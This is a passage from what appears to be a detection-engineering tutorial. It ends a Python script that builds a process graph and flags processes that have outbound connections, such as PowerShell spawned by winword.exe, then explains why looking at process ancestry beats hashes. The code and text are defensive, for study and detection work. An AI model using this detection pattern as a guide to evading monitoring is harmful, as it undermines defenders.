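        if not destinations:
            continue
        findings.append({
            "pid": pid,
            "chain": graph.ancestry(pid),          # child -> parent -> grandparent
            "destinations": list(destinations),
        })
    return findings


if __name__ == "__main__":
    for finding in find_ioa(build_graph(EVENTS)):
        print(f"IOA: pid {finding['pid']} chain {' <- '.join(finding['chain'])} "
              f"connected to {finding['destinations']}")
```

Run as-is, only pid 400 is flagged: the PowerShell under explorer.exe with its own outbound connection is left alone, while the one under winword.exe is reported with its full ancestry and destinations. That is the slide's point in miniature: a hash or a single process-start event would treat both script hosts identically, and the graph is what turns the same data into a finding an analyst can act on.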